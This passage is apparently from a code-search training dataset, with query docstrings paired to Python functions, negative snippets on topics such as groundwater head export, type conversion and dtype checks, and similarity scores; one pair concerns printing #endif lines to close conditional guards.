self.buy_page_excel_data_dictionary = self.get_excel_data_dictionary()\n is_compared = False\n dial_digits_grid_destination = self.get_specific_column_value_from_grid(self.vendor_price_list_detail_dial_digits_grid_div_id, 1, self.destination_column_name)\n if self.buy_page_excel_data_dictionary[\"Destination\"] == dial_digits_grid_destination:\n is_compared = True\n return is_compared", "def is_float(space, w_obj):\n return space.wrap(w_obj.tp == space.tp_float)", "def _session_has_export(self) -> bool:\n return bool(self._get_current_session_tiling_list())", "def export_heads(heads_file, grid, hdry, hnflo,\n kstpkper=(0, 0), levels=None, interval=None,\n export_water_table=True, export_depth_to_water=False,\n export_layers=False, land_surface_elevations=None,\n output_path='postproc', suffix=''):\n if np.isscalar(kstpkper[0]):\n kstpkper = [kstpkper]\n print('Exporting heads...')\n print('file: {}'.format(heads_file))\n\n pdfs_dir, rasters_dir, shps_dir = make_output_folders(output_path)\n\n outfiles = []\n for kstp, kper in kstpkper:\n print('stress period {}, timestep {}'.format(kper, kstp))\n # Heads output\n hdsobj = bf.HeadFile(heads_file)\n hds = hdsobj.get_data(kstpkper=(kstp, kper))\n \n if export_water_table or export_depth_to_water:\n wt = get_water_table(hds, nodata=hdry)\n wt[(wt > 9999) | (wt < 0)] = np.nan\n outfile = '{}/wt_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/wt_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, wt, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, wt, grid, levels=levels, interval=interval)\n outfiles += [outfile, ctr_outfile]\n \n if export_depth_to_water:\n if land_surface_elevations is None:\n raise ValueError(('export_heads: export_depth_to_water option '\n 'requires specification of the land surface'))\n if not isinstance(land_surface_elevations, np.ndarray):\n land_surface_elevations = np.loadtxt(land_surface_elevations)\n \n # Depth to water\n dtw = land_surface_elevations - wt \n\n # Overpressurization\n op = dtw.copy()\n # For DTW, mask areas of overpressurization;\n # For Overpressurization, mask areas where water table is below land surface\n op = np.ma.masked_array(op, mask=op > 0)\n dtw = np.ma.masked_array(dtw, mask=dtw < 0)\n \n if np.max(dtw) > 0:\n #dtw_levels = None\n #if interval is not None:\n # dtw_levels = np.linspace(0, np.nanmax(dtw), interval)\n outfile = '{}/dtw_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/dtw_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, dtw, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, dtw, grid, interval=interval)\n outfiles += [outfile, ctr_outfile]\n else:\n print('Water table is above land surface everywhere, skipping depth to water.')\n \n if np.nanmin(op) < 0:\n #op_levels = None\n #if interval is not None:\n # op_levels = np.linspace(0, np.nanmin(op), interval)\n outfile = '{}/op_per{}_stp{}{}.tif'.format(rasters_dir, kper, kstp, suffix)\n ctr_outfile = '{}/op_ctr_per{}_stp{}{}.shp'.format(shps_dir, kper, kstp, suffix)\n export_array(outfile, op, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, op, grid, interval=interval)\n outfiles += [outfile, ctr_outfile]\n else:\n print('No overpressurization, skipping.')\n \n\n hds[(hds > 9999) | (hds < 0)] = np.nan\n\n if export_layers:\n for k, h in enumerate(hds):\n outfile = '{}/hds_lay{}_per{}_stp{}{}.tif'.format(rasters_dir, k, kper, kstp, suffix)\n ctr_outfile = '{}/hds_ctr_lay{}_per{}_stp{}{}.shp'.format(shps_dir, k, kper, kstp, suffix)\n export_array(outfile, h, grid, nodata=hnflo)\n export_array_contours(ctr_outfile, h, grid, levels=levels, interval=interval,\n )\n outfiles += [outfile, ctr_outfile]\n return outfiles", "def test_log_dtypes(dtypes, capsys, test_df):\n\n @log_step(dtypes=dtypes)\n def do_nothing(df, *args, **kwargs):\n return df\n\n test_df.pipe(do_nothing)\n\n captured = capsys.readouterr()\n\n assert (\"dtypes=\" in captured.out) == dtypes\n\n if dtypes:\n assert str(test_df.dtypes.to_dict()) in captured.out", "def verify_as_target(self, message_handler):\n\n super().verify_as_target(message_handler)\n\n if self.msvc_target() != '64':\n raise UserException(\"MSVC is not configured for a 64-bit target\")", "def _validate_format(format_type):\n if format_type not in GeopandasWriter.formats:\n raise ValueError('Unsupported file format.')\n\n return True", "def species_has_freq(species_output_dict: dict) -> bool:\n if species_output_dict['paths']['freq'] or species_output_dict['paths']['composite']:\n return True\n return False", "def verifyShiftFile(self):\n if self['refimage'] and fu.findFile(self['refimage']):\n return True\n else: return False", "def test_make_binary_and_fp(self):\n output_mask = boundary_mask(df=os.path.join(data_dir, 'sample.csv'),\n geom_col=\"PolygonWKT_Pix\")\n truth_mask = skimage.io.imread(os.path.join(data_dir,\n 'sample_b_mask_inner.tif'))\n\n assert np.array_equal(output_mask, truth_mask)", "def _is_real(symbol):\n return isa(symbol, float) or is_int(symbol)", "def _has_right(self, j):\n return self._right(j) < len(self._data)", "def osarch_is_amd64():\n return osarch_match(\"amd64\")", "def signature_check(dummy, *args, **kwargs):\n try:\n dummy(*args, **kwargs)\n return True\n\n except TypeError:\n return False", "def _is_double(arr):\n\n # Figure out which dtype for data\n if arr.dtype == np.float32:\n return False\n elif arr.dtype == np.float64:\n return True\n else:\n raise ValueError(\"Only float32 or float64 dtypes are supported\")", "def has_right(self):\n return self.r is not None", "def check_has_dims(hdr):\n try:\n return (hdr['startX'], hdr['startY'])\n except KeyError:\n return False", "def test_short_header():\n with open(TEST_FILE_DXT5, \"rb\") as f:\n img_file = f.read()\n\n def short_header():\n with Image.open(BytesIO(img_file[:119])):\n pass # pragma: no cover\n\n with pytest.raises(OSError):\n short_header()", "def _type_check_double(self, data):\n if type(data) not in self._VALID_TYPES:\n return False\n return True", "def _check_truncation(self):\n\n temp_pos = self._handle.tell()\n self._handle.seek(-28, 2)\n eof = self._handle.read()\n self._handle.seek(temp_pos)\n if eof == _bgzf_eof:\n return False\n else:\n warnings.BytesWarning('No EOF character found. File may be truncated')\n return True", "def _has_printable_details(cls, categories, result_events_by_status):\n for category in categories:\n result_status_id = category[0]\n print_matching_tests = category[2]\n if print_matching_tests:\n if len(result_events_by_status[result_status_id]) > 0:\n # We found a printable details test result status\n # that has details to print.\n return True\n # We didn't find any test result category with printable\n # details.\n return False", "def test_kernel_hdrs_are_files(dataset: linux.LinuxSourcesDataset):\n for path in dataset.kernel_hdrs:\n assert path.is_file()" ]
[ "0.4971328", "0.46334147", "0.46194386", "0.46194386", "0.4604871", "0.4570718", "0.45214003", "0.45135522", "0.44693208", "0.44124466", "0.44066575", "0.44048572", "0.43934348", "0.43365443", "0.42555895", "0.4250501", "0.42504188", "0.42486706", "0.42251563", "0.4212047", "0.42047936", "0.41862556", "0.4112214", "0.41018462", "0.41007584", "0.40941316", "0.40904295", "0.40823355", "0.40790966", "0.40730295", "0.40599126", "0.403348", "0.4029554", "0.40273196", "0.40235263", "0.40114373", "0.39974904", "0.3992429", "0.39919725", "0.39778274", "0.39608744", "0.39595863", "0.39496619", "0.3942119", "0.39330813", "0.39284807", "0.39175943", "0.3912554", "0.3898651", "0.38971", "0.38966188", "0.3880652", "0.3879244", "0.38787842", "0.38753334", "0.38704824", "0.3852862", "0.38494197", "0.38443834", "0.3835735", "0.38276982", "0.382727", "0.38272518", "0.38205475", "0.38155863", "0.38126916", "0.38024986", "0.37906706", "0.3786908", "0.37854192", "0.37824824", "0.37791717", "0.3777909", "0.3777495", "0.37771943", "0.3776828", "0.37746513", "0.3766733", "0.37661263", "0.37613678", "0.3760275", "0.375796", "0.37566718", "0.3756244", "0.37524545", "0.37517887", "0.37502363", "0.37461016", "0.3740009", "0.37378207", "0.3734266", "0.37322098", "0.37296098", "0.37290102", "0.37284362", "0.3724881", "0.37209812", "0.37144157", "0.37106094", "0.3709791" ]
0.59550357
0
This function will close conditional guard opened by conditional_guard.
def close_conditional_guard(close_conditional): for _ in range(close_conditional): print("#endif")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __exit__(self, type, value, traceback) :\n if self.spec :\n self.handle.close()\n self.handle = None", "def __exit__(self, type, value, traceback):\n self._conn.close()\n if self._mode == 'w' and self.__special_exit != 'lock exists':\n if os.path.exists('%s_lock'%self._path):\n os.unlink('%s_lock'%self._path)\n else:\n print('Exiting write mode but no lock file exists => should not happen !')\n return 1\n return 0", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n return False # any exception is raised by the with statement.", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()\n return False", "def __exit__(self, unused_type, unused_value, unused_traceback):\n self.close()", "def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n if self._close_on_exit:\n self.close()", "def __exit__(self, *args):\n self.close()\n return False", "def __exit__(self, type_, value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.close()", "def __exit__(self, unused_exception_type, unused_exc_value, unused_traceback):\r\n self.close()", "def __exit__(self, type, value, traceback):\n self.fhandle.close()\n self._cleanup()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, type, value, traceback):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n return self.close()", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback) -> bool:\n self.close()\n return False", "def __exit__(self, type, value, traceback):\n\n self.close()", "def __exit__(self, exc_type, exc_value, exc_traceback):\n\n self.close()", "def _close(self):\n # TODO\n self.holding = False", "def __exit__(self, *args):\n self.close()\n # propagate exception\n return False", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.close()\n try:\n self._store.close()\n except AttributeError:\n pass", "def close(self):\n self.__exit__(None, None, None)", "def close(self):\n self.__exit__(None, None, None)", "def close():\n sys.exit()", "async def __aexit__(self, *exc_info):\n await self.close()\n return False", "def __exit__(self, exception_type, exception, traceback):\n self.close()", "def __exit__(self, exception_type, exception, traceback):\n self.close()", "def __exit__(self, *args, **kwargs):\n\t\tfcntl.flock(self.file, fcntl.LOCK_UN)\n\t\tself.file.close()\n\t\tfor function in self.exit_functions:\n\t\t\tfunction()", "def __exit__(self, type, value, traceback):\r\n if self.is_locked:\r\n self.release()", "def close():", "async def __aexit__(self, exc_type, exc_value, exc_tb):\n await self.close()\n # check for any exceptions\n if exc_type is not None:\n return False\n return True", "def __exit__(self, exception_type, exception_value, traceback):\n self.fileobject.close()", "def close(self):\n if self.hcam is not None:\n lib.is_ExitCamera(self.hcam)\n self.hcam=None\n self.hcam=None", "def close_and_exit(self):\n self.close()\n sys.exit(1)", "def do_close(self):\n self.cleanup(True)\n self.close()", "def __exit__(self, type_, value, traceback):\n if self.is_locked:\n self.release()", "def close(self):\n if self.dev_open:\n try:\n self.lib().close()\n except CygnetExc:\n pass\n self.dev_open = False", "def __del__(self):\n\n if self._is_open:\n self.close()", "def close(self):\n \n self.__exit__(None, None, None)\n return", "def close(self):\n self.is_open = False", "def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> Optional[bool]:\n\n self.close()\n return super().__exit__(exc_type, exc_value, traceback)", "def __exit__(self, *_exc):\r\n self.release()", "def __del__(self):\n if self._close_on_exit:\n self.close()", "async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self._close()", "def close(self):\n # This is a placeholder which is simply here to ensure close() can be\n # safely called from subclasses without worrying whether super-class'\n # have it (which in turn is useful in conjunction with the SourceMixin\n # class).\n pass", "def on_cleanup(self):\n self.close()", "def on_cleanup(self):\n self.close()", "def __exit__(self, exc_type, exc_value, traceback):\n self.file_out.close()", "def close(self):\n if self.current_file_number is not None:\n self.fh_raw.close()\n self.current_file_number = None", "def close(self):\n self.log.debug('RFSwitch - in RFSwitch close()')\n # Add code here to be executed only when the resource is closed.\n print(\"Calling RFSwitch:close\")", "def _closecontextmanager(self):\n yield\n self.close()", "def _closecontextmanager(self):\n yield\n self.close()", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.delete()\n if exc_type:\n return False\n return True", "def __exit__(self, exc_type, exc_value, exc_tb) -> None:\n self.destroy()", "def __exit__(self, exc_type, exc_value, exc_tb) -> None:\n self.destroy()", "def _close(self):\n self.fh.close()", "def close (self):\n pass\n #TODO: implement more realistic closing semantics", "def handle_close(self):\n self.active = False\n self.close()", "def __exit__(self, type, value, traceback):\r\n self.release()", "def __exit__(self, exc_type, exc_val, exc_tb) -> None:\n for obj in self.__dict__.values():\n if hasattr(obj, 'close'):\n obj.close()", "def __exit__(self, type, value, traceback):\n if not self.committed:\n self.write_coll.drop()\n\n if self.client is not None:\n self.client.close()\n self.client = None\n self.write_coll = None", "def terminate(self):\n super(ReacherEnv, self).close()", "async def __aexit__(self, exc_type, exc_val, exc_tb):\n self.release()\n return False", "def close(self):\n if self._open:\n self._open = False", "def release(self):\n if self.is_locked:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False", "def gt_helper_closed(self):\n self.gt_helper_open = False", "def close(self) -> None:\n ...", "def close(self) -> None:\n ...", "def __del__(self):\n try:\n self.close()\n except:\n pass", "def release(self):\r\n if self.is_locked:\r\n os.close(self.fd)\r\n os.unlink(self.lockfile)\r\n self.is_locked = False", "def __del__(self):\n if not getattr(self, \"closed\", True):\n self.close()", "def release(self):\n #关闭文件,删除文件\n if self.fd is not None:\n os.close(self.fd)\n os.unlink(self.lockfile)\n self.is_locked = False\n self.fd = None", "def close(self):\n self.__CheckOpen('close')\n self.__closed = True", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def safe_close(x):\n if not isinstance(x, io.IOBase):\n return\n if x.closed:\n return\n try:\n x.close()\n except Exception:\n pass", "def close_file_handle(self):\n if self.file_handle and self.output_file:\n self.file_handle.close()", "def release(self):\r\n\r\n if self._lock_fd:\r\n unlock_file(self._lock_fd, close=True)\r\n self._lock_fd = None\r\n return True\r\n else:\r\n return False", "async def aclose(self):\n with _core.open_cancel_scope(shield=True):\n if self.stdin is not None:\n await self.stdin.aclose()\n if self.stdout is not None:\n await self.stdout.aclose()\n if self.stderr is not None:\n await self.stderr.aclose()\n try:\n await self.wait()\n finally:\n if self.returncode is None:\n self.kill()\n with _core.open_cancel_scope(shield=True):\n await self.wait()", "def _close(self):\n log.Debug('dpbx.close():')", "def close(self):\n self.closed = True", "def close(self):\n self.exit()", "def close(self):\n ...", "def close(self):\n ...", "def __exit__(self, exc_type, exc_val, exc_tb):\n self.session.close()", "def __exit__(self, exc_type, exc_value, tb):\n if exc_type is not None:\n traceback.print_exception(exc_type, exc_value, tb)\n # return False # uncomment to pass exception through\n\n return True \n\n self.db = None\n self.client.close()\n\n return True", "def handle_close(self):\n storage.close()" ]
[ "0.6132105", "0.6084127", "0.6026904", "0.59685796", "0.59367067", "0.5921348", "0.5896142", "0.5895424", "0.5871011", "0.5860161", "0.5860161", "0.5860161", "0.5860161", "0.58590287", "0.58513856", "0.58342", "0.58342", "0.58342", "0.58342", "0.58342", "0.582248", "0.5806662", "0.5763474", "0.56884664", "0.5667379", "0.56626195", "0.56329864", "0.56240195", "0.5593488", "0.5593488", "0.5572039", "0.55582464", "0.5546976", "0.5546976", "0.5531616", "0.55252236", "0.5521608", "0.55150276", "0.54558486", "0.54268855", "0.54262346", "0.54259884", "0.54222965", "0.5420512", "0.54192746", "0.5419142", "0.53617036", "0.5360865", "0.5355155", "0.53530645", "0.5351024", "0.53431314", "0.53383315", "0.53383315", "0.5333428", "0.5314696", "0.5278073", "0.52752495", "0.52752495", "0.5261382", "0.525671", "0.525671", "0.52560174", "0.52552", "0.5254876", "0.5248747", "0.5247428", "0.52459353", "0.5242696", "0.5238975", "0.52257305", "0.5225449", "0.52195185", "0.5218177", "0.5218177", "0.521526", "0.52098554", "0.51988846", "0.5170201", "0.5168862", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.516581", "0.51651067", "0.5165036", "0.51608855", "0.516053", "0.5158139", "0.5154844", "0.5144969", "0.5144561", "0.5144561", "0.51315683", "0.511124", "0.5096017" ]
0.6058337
2
This helper function returns the correct clc core conversion function name for a given source and destination type, with optional size, mode and saturation arguments.
def clc_core_fn_name(dst, size='', mode='', sat=''): return "__clc_convert_{DST}{N}{SAT}{MODE}".format(DST=dst, N=size, SAT=sat, MODE=mode)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def src_get_name(converter_type):\n return ffi.string(_lib.src_get_name(converter_type)).decode()", "def cython_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cfs = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n cf = self.cython_functionname(x)[1]\n elif argkind is Arg.LIT:\n cf = self.cython_literal(x)\n elif argkind is Arg.VAR:\n cf = x\n elif isinstance(x, Number):\n cf = self.cython_literal(x)\n else:\n try:\n cf = self.cython_functionname(x)[1] # guess type\n except TypeError:\n cf = x # guess variable\n cfs.append(cf)\n fname += '' if 0 == len(cfs) else \"_\" + \"_\".join(cfs)\n return fname", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def cython_functionname(self, t, cycyt=None):\n if cycyt is None:\n t = self.canon(t)\n if isinstance(t, basestring):\n return t, self.cython_functionnames[t]\n elif t[0] in self.base_types:\n return t, self.cython_functionnames[t[0]]\n return self.cython_functionname(t, self.cython_functionnames[t[0]])\n d = {}\n for key, x in zip(self.template_types[t[0]], t[1:-1]):\n if isinstance(x, basestring):\n val = self.cython_functionnames[x] if x in self.cython_functionnames \\\n else x\n elif isinstance(x, Number):\n val = str(x).replace('-', 'Neg').replace('+', 'Pos')\\\n .replace('.', 'point')\n elif x[0] in self.base_types:\n val = self.cython_functionnames[x[0]]\n else:\n _, val = self.cython_functionname(x, self.cython_functionnames[x[0]])\n d[key] = val\n return t, cycyt.format(**d)", "def get_conv(name):\n trans_funs = {\n 'mbconv_transform': MBConv,\n 'mbtalkconv_transform': MBTalkConv,\n }\n assert name in trans_funs.keys(), \\\n 'Transformation function \\'{}\\' not supported'.format(name)\n return trans_funs[name]", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)", "def cfunc_type(self):\n tif = ida_typeinf.tinfo_t()\n result = self.get_func_type(tif)\n if not result:\n return\n return tif", "def get_ctype_name(*args):\n return _ida_hexrays.get_ctype_name(*args)", "def cpp_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cts = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n ct = self.cpp_type(x)\n elif argkind is Arg.LIT:\n ct = self.cpp_literal(x)\n elif isinstance(x, Number):\n ct = self.cpp_literal(x)\n else:\n try:\n ct = self.cpp_type(x) # guess it is a type\n except TypeError:\n ct = x # guess it is a variable\n cts.append(ct)\n fname += '' if 0 == len(cts) else \"< \" + \", \".join(cts) + \" >\"\n return fname", "def cp_name(cp):\n return '%s%04X' % ('u' if cp > 0xffff else 'uni', cp)", "def get_class_decoder_function_name(name):\n name = get_class_functional_name(name)\n return 'decode_{0}'.format(name)", "def convert_C_instruction(self, instruction):\n comp, dest, jump = self.parse(instruction)\n\n return f\"111{convert_comp(comp)}{convert_dest(dest)}\" \\\n f\"{convert_jump(jump)}\"", "def as_function_name(self, string):\n return idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def getconversiontype(self, *args, **kwargs):\n return _coordsys.coordsys_getconversiontype(self, *args, **kwargs)", "def _make_class_name(name):\n return name[0].upper() + name[1:] + \"Ufunc\"", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def get_cie1931_color_matching_function():\n\n filename = os.path.dirname(os.path.abspath(__file__))\\\n + os.path.normpath(\"/data/cie_1931_color_matching_function.csv\")\n data = np.loadtxt(filename, delimiter=',', skiprows=1).T\n\n return np.uint16(data[0]), data[1:]", "def convertion_name(idn):\n inputn = 'f522_dh.trainingdata_in.lcv.'+idn+'.hdf5'\n outputn = 'jacobian_'+idn+'.npy'\n return(inputn, outputn)", "def _configure_image_name(self, ccd_operation_mode,\n include_star_mag=False):\n dic = ccd_operation_mode\n em_gain = '_G' + str(dic['em_gain'])\n em_mode = 'CONV'\n if dic['em_mode'] == 1:\n em_mode = 'EM'\n hss = '_HSS' + str(dic['hss'])\n preamp = '_PA' + str(dic['preamp'])\n binn = '_B' + str(dic['binn'])\n t_exp = '_TEXP' + str(dic['t_exp'])\n self.image_name = em_mode + hss + preamp + binn + t_exp + em_gain\n\n if include_star_mag:\n star_flux = '_S' + str(self.star_magnitude)\n self.image_name += star_flux", "def name_from_dist(dist_func):\n return str(dist_func).split()[0].split('.')[-1][:-4]", "def conversion(temp, mode):\n if mode == 1:\n c_to_f = (temp * 9/5) + 32\n return c_to_f\n else:\n f_to_c = (temp - 32) * 5 / 9\n return f_to_c", "def cast(*args):\n return _ITKCostFunctionsPython.itkCostFunction_cast(*args)", "def _get_converter(orig, target):\n try:\n func = getattr(utils, f'convert_{orig}_to_{target}')\n except AttributeError:\n func = partial(convert_unit, orig=orig, to=target)\n return func", "def get_func_type(header):\n func_type = header.functionType\n if func_type == SSE.SCALAR:\n return FunctionType.Scalar\n elif func_type == SSE.AGGREGATION:\n return FunctionType.Aggregation\n elif func_type == SSE.TENSOR:\n return FunctionType.Tensor", "def mode(v_o, Vcc):\n if v_o == Vcc:\n return \"positive saturation\"\n if v_o >= -Vcc and v_o <= Vcc:\n return \"linear region\"\n if v_o == -Vcc:\n return \"negative saturation\"", "def getColorTransferFunction(self):\n\t\treturn self.ctf", "def band_to_cname(input_band: str):\n bands_ref = ((\"red\", \"R\"), (\"green\", \"G\"), (\"blue\", \"B\"), ('nir', \"N\"))\n if isinstance(input_band, int) and 1 <= input_band <= 4:\n return bands_ref[input_band-1][0]\n elif isinstance(input_band, str) and len(input_band) == 1:\n for cname, short_name in bands_ref:\n if input_band == short_name:\n return cname\n elif isinstance(input_band, str) and len(input_band) > 1:\n for cname, short_name in bands_ref:\n if input_band == cname:\n return input_band\n else:\n raise ValueError(f\"Cannot convert given band to valid stac common name. Got: {input_band}\")", "def createSourceName(self, protocol, pfn):\n return pfn", "def rename(op_name):\n return type(op_name, (OpConverter,), {})", "def _type_name(cls, manual_name):\r\n cf_name = ''\r\n if manual_name:\r\n cf_name = manual_name.lower()\r\n else:\r\n camelcase = re.compile(r'([a-z])([A-Z])')\r\n ccase = lambda s: camelcase.sub(lambda v: '{}_{}'.format(v.group(1), v.group(2).lower()), s)\r\n \r\n cf_name += ccase(cls.__name__)\r\n cf_name = cf_name.lower()\r\n if cls.__use_module_name__:\r\n cf_name = cls.__module__ + '_{}'.format(cf_name)\r\n return cf_name", "def get_chip_fname_fmt(ibs=None, suffix=None):\n if suffix is None:\n chip_cfg = ibs.cfg.chip_cfg\n chip_cfgstr = chip_cfg.get_cfgstr() # algo settings cfgstr\n chip_cfgfmt = chip_cfg['chipfmt'] # png / jpeg (BUGS WILL BE INTRODUCED IF THIS CHANGES)\n suffix = chip_cfgstr + chip_cfgfmt\n # Chip filenames are a function of annotation_rowid and cfgstr\n _cfname_fmt = ('aid_%d' + suffix)\n return _cfname_fmt", "def name_conversion(caffe_layer_name, prefix=''):\n # beginning & end mapping\n NAME_MAP = {\n 'bn_conv1/beta': 'conv0/BatchNorm/beta:0',\n 'bn_conv1/gamma': 'conv0/BatchNorm/gamma:0',\n 'bn_conv1/mean/EMA': 'conv0/BatchNorm/moving_mean:0',\n 'bn_conv1/variance/EMA': 'conv0/BatchNorm/moving_variance:0',\n 'conv1/W': 'conv0/weights:0', 'conv1/b': 'conv0/biases:0',\n 'fc1000/W': 'fc1000/weights:0', 'fc1000/b': 'fc1000/biases:0'}\n if caffe_layer_name in NAME_MAP:\n return prefix + NAME_MAP[caffe_layer_name]\n\n s = re.search('([a-z]+)([0-9]+)([a-z]+)_', caffe_layer_name)\n if s is None:\n s = re.search('([a-z]+)([0-9]+)([a-z]+)([0-9]+)_', caffe_layer_name)\n layer_block_part1 = s.group(3)\n layer_block_part2 = s.group(4)\n assert layer_block_part1 in ['a', 'b']\n layer_block = 0 if layer_block_part1 == 'a' else int(layer_block_part2)\n else:\n layer_block = ord(s.group(3)) - ord('a')\n layer_type = s.group(1)\n layer_group = s.group(2)\n\n layer_branch = int(re.search('_branch([0-9])', caffe_layer_name).group(1))\n assert layer_branch in [1, 2]\n if layer_branch == 2:\n layer_id = re.search('_branch[0-9]([a-z])/', caffe_layer_name).group(1)\n layer_id = ord(layer_id) - ord('a') + 1\n\n TYPE_DICT = {'res':'conv', 'bn':'BatchNorm'}\n name_map = {'/W': '/weights:0', '/b': '/biases:0', '/beta': '/beta:0',\n '/gamma': '/gamma:0', '/mean/EMA': '/moving_mean:0',\n '/variance/EMA': '/moving_variance:0'}\n\n tf_name = caffe_layer_name[caffe_layer_name.index('/'):]\n #print(tf_name)\n if tf_name in name_map:\n tf_name = name_map[tf_name]\n #print(layer_type)\n #if layer_type != 'bn':\n if layer_type == 'res':\n layer_type = TYPE_DICT[layer_type] + (str(layer_id)\n if layer_branch == 2 else 'shortcut')\n elif layer_branch == 2:\n layer_type = 'conv' + str(layer_id) + '/' + TYPE_DICT[layer_type]\n elif layer_branch == 1:\n layer_type = 'convshortcut/' + TYPE_DICT[layer_type]\n tf_name = 'group{}/block{}/{}'.format(int(layer_group) - 2,\n layer_block, layer_type) + tf_name\n return prefix + tf_name", "def name_conversion(caffe_layer_name, prefix=''):\n # beginning & end mapping\n NAME_MAP = {\n 'bn_conv1/beta': 'conv0/BatchNorm/beta:0',\n 'bn_conv1/gamma': 'conv0/BatchNorm/gamma:0',\n 'bn_conv1/mean/EMA': 'conv0/BatchNorm/moving_mean:0',\n 'bn_conv1/variance/EMA': 'conv0/BatchNorm/moving_variance:0',\n 'conv1/W': 'conv0/weights:0', 'conv1/b': 'conv0/biases:0',\n 'fc1000/W': 'fc1000/weights:0', 'fc1000/b': 'fc1000/biases:0'}\n if caffe_layer_name in NAME_MAP:\n return prefix + NAME_MAP[caffe_layer_name]\n\n s = re.search('([a-z]+)([0-9]+)([a-z]+)_', caffe_layer_name)\n if s is None:\n s = re.search('([a-z]+)([0-9]+)([a-z]+)([0-9]+)_', caffe_layer_name)\n layer_block_part1 = s.group(3)\n layer_block_part2 = s.group(4)\n assert layer_block_part1 in ['a', 'b']\n layer_block = 0 if layer_block_part1 == 'a' else int(layer_block_part2)\n else:\n layer_block = ord(s.group(3)) - ord('a')\n layer_type = s.group(1)\n layer_group = s.group(2)\n\n layer_branch = int(re.search('_branch([0-9])', caffe_layer_name).group(1))\n assert layer_branch in [1, 2]\n if layer_branch == 2:\n layer_id = re.search('_branch[0-9]([a-z])/', caffe_layer_name).group(1)\n layer_id = ord(layer_id) - ord('a') + 1\n\n TYPE_DICT = {'res':'conv', 'bn':'BatchNorm'}\n name_map = {'/W': '/weights:0', '/b': '/biases:0', '/beta': '/beta:0',\n '/gamma': '/gamma:0', '/mean/EMA': '/moving_mean:0',\n '/variance/EMA': '/moving_variance:0'}\n\n tf_name = caffe_layer_name[caffe_layer_name.index('/'):]\n #print(tf_name)\n if tf_name in name_map:\n tf_name = name_map[tf_name]\n #print(layer_type)\n #if layer_type != 'bn':\n if layer_type == 'res':\n layer_type = TYPE_DICT[layer_type] + (str(layer_id)\n if layer_branch == 2 else 'shortcut')\n elif layer_branch == 2:\n layer_type = 'conv' + str(layer_id) + '/' + TYPE_DICT[layer_type]\n elif layer_branch == 1:\n layer_type = 'convshortcut/' + TYPE_DICT[layer_type]\n tf_name = 'group{}/block{}/{}'.format(int(layer_group) - 2,\n layer_block, layer_type) + tf_name\n return prefix + tf_name", "def itkCostFunction_cast(*args):\n return _ITKCostFunctionsPython.itkCostFunction_cast(*args)", "def scalar_conv(self, round_mode, dst, src):\n # check Scalar\n TikCheckUtil.check_type_match(\n dst, Scalar, 'scalar conv dst must be a scalar')\n TikCheckUtil.check_type_match(\n src, Scalar, 'scalar conv src must be a scalar')\n # check dtype\n dtype_str = DTYPE_MAP[src.dtype] + '2' + DTYPE_MAP[\n dst.dtype] + ROUND_MODE_MAP[round_mode]\n TikCheckUtil.check_equality(api_check_support(\"tik.\" +\n \"scalar_conv\",\n dtype_str), True,\n INSTR_DTYPE_SUPPORT_STATEMENT.\n format(dtype_str, \"scalar_conv\"))\n # code gen\n with self.new_scope():\n # f322s32z: convert f32 to s32, any number out of s32 range\n # will be +/- s32 max number.\n # round mode = Z. round to zero(c language trunc)\n if dtype_str in ('s322f32', 'f322f16', 